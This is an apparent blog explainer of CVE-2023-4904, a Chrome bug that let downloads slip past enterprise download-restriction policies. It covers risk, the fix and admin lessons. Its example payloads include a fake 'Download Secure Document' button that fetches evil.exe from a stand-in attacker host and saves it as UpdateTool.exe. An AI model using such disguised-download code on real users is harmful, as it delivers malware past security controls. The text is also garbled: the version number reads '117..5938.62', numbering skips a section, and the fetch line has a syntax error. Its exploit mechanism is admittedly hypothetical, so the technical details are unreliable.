CVE-2023-4904 - How Insufficient Policy Enforcement in Google Chrome Downloads Allowed Enterprises to Be Side-Stepped

Google Chrome is the most popular web browser in the world, widely adopted not only by personal users but also across businesses and large organizations. To keep organizations safe, Chrome supports extensive policy controls for enterprise admins, letting them control what users are allowed to download, install, or run inside the browser. But what happens when those policies aren’t enforced correctly?

In this long read, we’ll explore CVE-2023-4904 — a security flaw discovered in Google Chrome that allowed a crafty attacker to bypass enterprise download restrictions. We’ll look at what the bug was, how attackers could exploit it, and what admins and developers can learn from it.

What Exactly is CVE-2023-4904?

This vulnerability is described as "Insufficient policy enforcement in Downloads in Google Chrome prior to 117..5938.62." It was reported by a security researcher and classified as medium severity (Chromium issue 1478131).

In simple terms: Chrome lets enterprise admins set policies that restrict which files users can download (for example, blocking anything but PDFs). Due to a bug, an attacker could trick Chrome into ignoring those policies for certain downloads, allowing restricted files to be saved anyway.

Potential impact: If your organization counted on Chrome to block executable files (EXEs, scripts, etc.), attackers might ("with the right set-up") trick your users into downloading malware or other threats, even when policy says “No!”

1. Chrome's Download Policy Workflow

When an enterprise policy is in place (using DownloadRestrictions or URLBlocklist, for example), Chrome is supposed to check files *before* letting users save them. For example, a JSON policy deployed via Active Directory:

{
  "DownloadRestrictions": 3  // Block dangerous downloads
}

2. Policy Enforcement Point

Normally, as a user initiates a download, Chrome checks the requested file against active policies. If a file doesn’t pass the rules, the download is blocked, and the user is notified.

Here’s where CVE-2023-4904 bit Chrome

Through careful crafting, an attacker could serve a file in a particular way (for example, setting tricky headers, using certain URLs, or triggering download requests via JavaScript). This slipped the file past the enforcement checkpoint, so Chrome did not apply the intended policy, and the file was downloaded anyway.

Hypothetical code snippet:
The attacker could leverage JavaScript to create a ‘blob’ download, which Chrome policy enforcement might overlook.

// Attacker runs this script on a booby-trapped website
const payload = new Uint8Array([ /* malicious bytes here */ ]);
const blob = new Blob([payload], { type: "application/octet-stream" });
const anchor = document.createElement("a");
anchor.href = URL.createObjectURL(blob);
anchor.download = "evil.exe"; // Executable file, normally blocked by policy
anchor.click(); // Triggers the download

Because the download was triggered via a Blob URL (not a traditional URL), Chrome’s policy filter could miss the restriction and allow the download. (The exact triggering method used by attackers may vary.)

4. Who Was At Risk?

Any organization that used Chrome’s enterprise download restrictions and counted on it to prevent non-approved file types. Home users weren’t directly affected unless using enterprise policies.

What Would an Attack Look Like?

1. Attacker convinces a victim inside the enterprise to visit a specially crafted website (phishing, malicious ad, drive-by, etc.).

Example payloads (simplified)

<!-- Hidden download link disguised as a button -->
<button onclick="downloadEvil()">Download Secure Document</button>
<script>
  function downloadEvil() {
    fetch('https://evilsite.com/evil.exe';)
      .then(resp => resp.blob())
      .then(blob => {
        let url = URL.createObjectURL(blob);
        let a = document.createElement('a');
        a.href = url;
        a.download = "UpdateTool.exe";
        a.click();
      });
  }
</script>

This technique could evade download restrictions, letting the executable slip through.

How Was It Fixed?

Google Chrome’s team patched the vulnerability in version 117..5938.62 by tightening the places where policies are checked, adding extra checks for Blob URLs and other creative download sources.

Mitigation:
Upgrade to the latest version of Chrome as soon as possible (117..5938.62 or later).
Re-assess enterprise download policies after upgrade to ensure they work as expected.

Practical Lessons for Admins and Developers

- Don’t rely solely on browser policy enforcement. Layer your defenses with endpoint protection, email security, and user training.

Keep browsers updated. Chrome’s popularity makes it a constant target. Patch deadlines matter.

- Test your controls. After deploying policies, test them using edge cases and creative download triggers (web APIs, blobs, downloads-in-iframe, etc.).
- Monitor download activity. Even with policies in place, keep an eye out for strange downloads on your network.

References and Further Reading

- CVE-2023-4904 - NVD
- Chrome Releases Blog (117..5938.62)
- Chromium Issue 1478131
- Google Chrome Enterprise Policy List

Conclusion

CVE-2023-4904 is a classic reminder that defenses are only as strong as their implementation. Policy features in browsers are fantastic, but they always need to be hardened against creative attacks. Always update promptly, layer your defenses, and keep looking for new angles to test your controls. The next vulnerability might be right around the corner!

Timeline

Published on: 09/12/2023 21:15:08 UTC
Last modified on: 10/17/2023 19:51:00 UTC